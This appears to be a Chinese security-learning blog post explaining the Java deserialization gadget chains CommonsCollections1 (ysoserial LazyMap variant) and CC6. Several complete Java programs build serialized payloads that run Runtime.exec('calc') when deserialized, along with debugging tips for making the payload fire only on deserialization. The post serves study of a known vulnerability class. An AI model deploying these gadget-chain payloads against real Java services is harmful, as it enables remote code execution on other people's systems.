Java安全--CC1的补充和CC6

news2024/12/27 12:59:29

CC1的补充

上一次讲的是cc链的一种形式,这个补充的cc链子是yso的cc链。

这个链子确实比较麻烦,但是和我们下一步要学习的cc6有比较紧的联系。所以做一下补充,值得一提的是这个链子也确实很巧妙

我们看一下两条链子的分歧在哪里:

ChainedTransformer.transform()开始往下和上一次讲的链子是一样的,这里就不赘述了。不一样的是transformer调用的函数从TransformedMap.checkSetValue()变成了LazyMap.get()

我们现在的目标是搜索那里调用了get方法-->也是AnnotationInvocationHandler

需要利用的点在AnnotationInvocationHandlerinvoke()里面,而学完动态代理我们知道InvocationHandler是动态代理类,所以要触发invoke方法需要调用AnnotationInvocationHandler的方法就会调用invoke方法。

,具体invoke方法的调用:

这里这个细节我纠了好久,网上搜不到,最后在jdk文档里面发现了。当在与之关联的代理示例上调用方法时,将在调用处理程序中调用此方法

但是这里虽然调用任意实例的方法都会进入到invoke里面,但是具体要执行什么方法确实要斟酌一下,我们可以看一下啊AnnotationInvocationHandlerinvoke方法体:

需要过几个判断,一一分析一下:

if (member.equals("equals") && paramTypes.length == 1 &&
    paramTypes[0] == Object.class)
    return equalsImpl(args[0]);
if (paramTypes.length != 0)
    throw new AssertionError("Too many parameters for an annotation method");

第一个判断是判断调用的函数是不是equals,如果是就会执行到return了,所以不能调用equals

第二个判断是判断调用的函数是否有参数,如果有则抛出异常,所以我们调用的函数也不能有参数。

然后就可以执行我们想要执行的 memberValues.get(member);

我们只要控制memberValues.get(member); 为LazyMap就可以了

下一步目标是寻找如何触发invoke了,很巧妙的就是刚好同样是AnnotationInvocationHandler这个类的readObject入口有一处执行了无参的方法,从这里可以调用一个无参的方法。刚刚好绕过上面的if条件。

而且这里的memberValues也是我们可以控制的,通过构造函数传参传入的。

但是触发invoke我们需要使用动态代理的类包装一下,然后再传入LazyMap

package org.example;


import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;
import org.omg.SendingContext.RunTime;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class Test {
    public static void main(String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, ClassNotFoundException, InstantiationException {

        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map decorate = LazyMap.decorate(hashMap, chainedTransformer);


        Class aih = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor declaredConstructor = aih.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        InvocationHandler proxy = (InvocationHandler) declaredConstructor.newInstance(Target.class, decorate);

        Map m = (Map)Proxy.newProxyInstance(LazyMap.class.getClassLoader(),new Class[]{Map.class}, proxy);
        Object o = declaredConstructor.newInstance(Target.class, m);

        serialize(o);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

贴一下yso的链子:

Gadget chain:
		ObjectInputStream.readObject()
			AnnotationInvocationHandler.readObject()
				Map(Proxy).entrySet()
					AnnotationInvocationHandler.invoke()
						LazyMap.get()
							ChainedTransformer.transform()
								ConstantTransformer.transform()
								InvokerTransformer.transform()
									Method.invoke()
										Class.getMethod()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.getRuntime()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.exec()

CC6

来看一下CC6的链子:

Gadget chain:
	    java.io.ObjectInputStream.readObject()
            java.util.HashSet.readObject()
                java.util.HashMap.put()
                java.util.HashMap.hash()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                        org.apache.commons.collections.map.LazyMap.get()
                            org.apache.commons.collections.functors.ChainedTransformer.transform()
                            org.apache.commons.collections.functors.InvokerTransformer.transform()
                            java.lang.reflect.Method.invoke()
                                java.lang.Runtime.exec()

从LazyMap开始是和这个补充的CC1一样。同样道理我们看一下分歧点在哪里

我们上一次的思路是寻找何处调用了get,并且调用get的参数可控。

我们找到了AnnotationInvocationHandler中的memberValues.get(member)

这次我们寻找的是TiedMapEntry中的getValue,并且这个map刚好我们可控,只要设置成LazyMap就可以完成后面的链子了。

下一步工作就是寻找何处调用了getValue,刚好也在TiedMapEntry中的hashCode中调用了getValue

hashCode()我们十分熟悉,不就是上次URLDNS那条链子吗。简单回顾一下URLDNS:

Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()

所以我们就可以通过HashMap中的put来接上TiedMaoEntry.hashCode();

我们这里是put调用hash(),然后调用同名函数hashCode(),就会走到TiedMapEntry的同名函数hashCode()

于是我们编写第一版payload:

package org.example;

import com.sun.net.httpserver.Filter;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC6 {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map decorate = LazyMap.decorate(hashMap, chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(decorate, "key1");

        HashMap<Object, Object> hashMap1 = new HashMap<>();
        tiedMapEntry.put(tiedMapEntry,"key2");

        serialize(hashMap1);
//        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

我们发现序列化的时候会弹计算机,而反序列并不会弹计算机。。

其实这个问题和上次的URLDNS一样,因为序列化的时候put就会走到后面的链子中。那为什么它走了一次反序列化就走不进去呢?

我们调试:

我们通过调试发现在序列化的时候会再添加一个Entry(键值对),所以反序列化的时候这里判断就会是true。


为什么添加了一个Entry(键值对)反序列的时候判断就是true了?

关于containsKey这里给出了一个例子,可以更好理解:

因为containsKey(key)这个函数是判断这个key是否添加过。这里序列化的时候就添加了,所以反序列化的时候会判断出添加过了,就不会执行if里面的语句了。

那怎么解决这个问题?

很简单,我们不能阻止它添加,但是我们可以删除他添加过的呀。所以我们可以把这个Entry删除掉。

因此我们在序列化之前添加一句:

decorate.remove("key1");

注意这里是decorate.remover("key1");

不是hashMap("key1");

package org.example;

import com.sun.net.httpserver.Filter;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC6 {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map decorate = LazyMap.decorate(hashMap, chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(decorate, "key1");

        HashMap<Object, Object> hashMap1 = new HashMap<>();
        hashMap1.put(tiedMapEntry,"key2");
        decorate.remove("key1");


//        serialize(hashMap1);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

但是我们希望在序列化的时候不会弹计算机,因为这样会影响我们判断反序列化的结果。所以我们可以改进这个代码,在序列化的时候传进去的Transformer是执行不到恶意类的,然后通过反射在put之后再修改TransformerchainedTransformer。所以改进代码如下:

package org.example;

import com.sun.net.httpserver.Filter;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC6 {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map<Object,Object> decorate = LazyMap.decorate(hashMap, new ConstantTransformer(Runtime.class));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(decorate, "key1");

        HashMap<Object, Object> hashMap1 = new HashMap<>();
        hashMap1.put(tiedMapEntry,"key2");
        decorate.remove("key1");

        Class aClass = LazyMap.class;
        Field factory = aClass.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(decorate,chainedTransformer);

        serialize(hashMap1);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

这两个链子更有趣的点在于CC6不受JDK版本限制,CC1需在jdk8u65的版本。那为什么jdk8u71之后就不能使用呢?

因为jdk8u71对AnnotationInvocationHandler的readObject做了改进。

我们看一下jdk8u71的AnnotationInvocationHandler的readObject里面哪里发生了改变

没找到8u71的openjdk就用这个反编译了

但是这个区别的理解还是比较肤浅,只能暂时到这。

有个小坑

如果切换了jdk版本用CC1还是能弹计算器,可能是序列化的内容没有覆盖ser.bin文件,这个时候需要先把ser.bin文件删除了再序列化,此时再反序列化的话就不会弹计算器了。这个小坑感谢xioaqiuxx师傅解答

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/71597.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[附源码]Python计算机毕业设计Django影评网站系统

项目运行 环境配置&#xff1a; Pychram社区版 python3.7.7 Mysql5.7 HBuilderXlist pipNavicat11Djangonodejs。 项目技术&#xff1a; django python Vue 等等组成&#xff0c;B/S模式 pychram管理等等。 环境需要 1.运行环境&#xff1a;最好是python3.7.7&#xff0c;…

在地图上基于OpenLayers实现点/线/面静态的绘制显示

在做GIS相关的工作过程中&#xff0c;是离不开矢量的数据的。矢量作为最基础的数据形式&#xff0c;一般通用在各个项目中。在导航软件开发或者应用中&#xff0c;点/线/面的标记&#xff0c;标绘&#xff0c;显示等都是不可缺少的。本文主要是来介绍在地图上基于OpenLayers实现…

Qt-数据库开发-QTableView操作数据库(2)

Qt-数据库开发-QTableView操作数据库、自增Key 文章目录Qt-数据库开发-QTableView操作数据库、自增Key1、概述2、实现效果3、主要代码4、完整源代码更多精彩内容&#x1f449;个人内容分类汇总 &#x1f448;&#x1f449;数据库开发 &#x1f448; 1、概述 在开发数据库开发时…

40 | Linux安装node.js

1 环境准备 系统为ubuntu系统 2 下载压缩包 2.1 参考地址&#xff1a; https://nodejs.org/zh-cn/download/releases/2.2 创建文件夹 mkdir software wget https://nodejs.org/download/release/v16.18.0/node-v16.18.0-linux-x64.tar.gz2.3 解压 2.3.1 解压二进制文件…

docker——对镜像的操控笔记

一:镜像在哪里 这个问题问到点子上了,就好像说肉好吃,那你告诉我哪里才能买的到? 1. docker官方渠道 docker官方有一个 Docker Hub 网址,你能想到和想不到的镜像这上面都有,比如web开发者熟悉的nginx,redis,mongodb等等,而且还告诉 你怎么去下载,如下图: 接下来你可…

【Zookeeper】学习笔记(二)

Zookeeper学习笔记四、客户端命令4.1、新增节点4.2、查询节点信息4.3、节点类型4.4、更新节点4.5、删除节点4.6、监听器五、SpringBOOT整合Zookeeper六、写数据流程6.1、写流程之写入请求直接发送给Leader节点6.2、写流程之写入请求发送给follower节点七、服务器动态上下线监听…

Matlab 中 global 函数实例解析

目录 global 函数 案例分析 1 案例分析 2 使用golbal的优点 1. 传递大数据的参数 2. 过多的常量需要传递 global 函数 比如在主函数里面&#xff0c;你需要设置 Nc 这个变量是一个全局变量&#xff0c;就需要声明一下&#xff1a; global Nc; 然后在子函数里面你又用到了…

EMQX 多版本发布、新增自定义函数功能

11 月&#xff0c;EMQX 开源版和企业版分别发布了多个迭代版本&#xff0c;在安全性保障和生态集成方面又有了新的提升。 MQTT 消息云服务 EMQX Cloud 推出了新功能——自定义函数&#xff0c;用户可以更方便地将 IoT 数据处理为符合数据流的数据格式。 EMQX 11 月 EMQX 开源…

记一次golang struct字符串值被挤掉(被异常修改)的问题

使用的是gofiber框架&#xff0c;在包内设置了一个全局变量来保存数据&#xff0c;如下: var list make(map[int64]*Task, 10) type Task struct {ID int64Name string }gofiber设置了两个接口&#xff0c;一个是创建&#xff1a; func Create(c *fiber.Ctx) error {task : …

投票评选小程序毕业设计,微信投票小程序系统设计与实现,微信小程序毕业设计论文怎么写毕设源码开题报告需求分析怎么做

项目背景和意义 目的&#xff1a;本课题主要目标是设计并能够实现一个基于微信小程序评选投票系统&#xff0c;前台用户使用小程序&#xff0c;后台管理使用基PHPMySql的B/S架构&#xff1b;通过后台添加资讯、管理上传投票信息、用户管理等&#xff1b;用户通过小程序登录&…

高等数学(第七版)同济大学 总习题十 (前6题)个人解答

高等数学&#xff08;第七版&#xff09;同济大学 总习题十&#xff08;前6题&#xff09; 函数作图软件&#xff1a;Mathematica 1.填空&#xff1a;\begin{aligned}&1. \ 填空&#xff1a;&\end{aligned}​1. 填空&#xff1a;​​ (1)积分∫02dx∫x2e−y2dy的值是_…

[附源码]Python计算机毕业设计Django作业管理系统

项目运行 环境配置&#xff1a; Pychram社区版 python3.7.7 Mysql5.7 HBuilderXlist pipNavicat11Djangonodejs。 项目技术&#xff1a; django python Vue 等等组成&#xff0c;B/S模式 pychram管理等等。 环境需要 1.运行环境&#xff1a;最好是python3.7.7&#xff0c;…

Linux keepalived高可用集群+keepaliced+LVS

Linux keepalived高可用集群keepalicedLVS keepalivedlvs集群 环境准备 拓扑&#xff1a; 192.168.0.116 dr1 负载均衡器 192.168.0.117 dr2 负载均衡器 192.168.0.118 rs1 web1 192.168.0.119 rs2 web2 1.在master上安装配置Keepalived: yum install keepalived ipvsadm…

需求响应|动态冰蓄冷系统与需求响应策略的优化研究(Matlab代码实现)

&#x1f4a5;&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️❤️&#x1f4a5;&#x1f4a5;&#x1f4a5; &#x1f4dd;目前更新&#xff1a;&#x1f31f;&#x1f31f;&#x1f31f;电力系统相关知识&#xff0c;期刊论文&…

WEB静态网页作业 我的家乡南宁 家乡旅游网页设计制作 简单静态HTML网页作品

家乡旅游景点网页作业制作 网页代码运用了DIV盒子的使用方法&#xff0c;如盒子的嵌套、浮动、margin、border、background等属性的使用&#xff0c;外部大盒子设定居中&#xff0c;内部左中右布局&#xff0c;下方横向浮动排列&#xff0c;大学学习的前端知识点和布局方式都有…

Spring Boot + Redis 解决重复提交问题,一文带你搞懂,最详细教程

文章目录**前言****搭建 Redis 服务 API****自定义注解 AutoIdempotent****token 创建和检验****拦截器的配置****测试用例****总结**前言 在实际的开发项目中,一个对外暴露的接口往往会面临很多次请求&#xff0c;我们来解释一下幂等的概念&#xff1a;任意多次执行所产生的影…

使用formatter方法格式化数据

前言 当你在表格中根据标识展示不同字段时&#xff0c;你发现&#xff0c;这个标识的类型有很多&#xff0c;需要一个一个判断很多行代码。当然&#xff0c;标识的类型比较少时&#xff0c;直接通过判断展示不同的字段无疑是最快的&#xff0c;如下代码。一旦匹配的标识类型有几…

java自动化接口如何获取返回值中特定的字段HttpEntity类转换成实体类对象<搬代码>

第一看一下返回值是什么样子的&#xff1a; {"msg": "查询成功","total": 9223xxx75807,"code": 200,"maps": null,"devMsg": null,"rows": [{"detxxxme": "商户来**交易10000.00元&qu…

【云原生微服务】SpringCloud Commons通用抽象

&#x1f496; Spring家族及微服务系列文章 ✨【微服务】SpringCloud中OpenFeign请求处理及负载均衡流程 ✨【微服务】SpringCloud中Ribbon的WeightedResponseTimeRule策略 ✨【微服务】SpringCloud中Ribbon的轮询(RoundRobinRule)与重试(RetryRule)策略 ✨【微服务】SpringCl…

二叉搜索树-技术点

二叉树的描述 相当于给树来个计划生育 二叉树的原理 二叉树只允许最多两个节点 二叉树节点最多有两个节点 并不是一定要有两个分支节点 如图所示: 在非空的二叉树里,具有i-1层的节点的总数不超过2的i-1次方 i>1 深度为h-1的二叉树 最多有二的h次方 -1个结点 最少有h个结…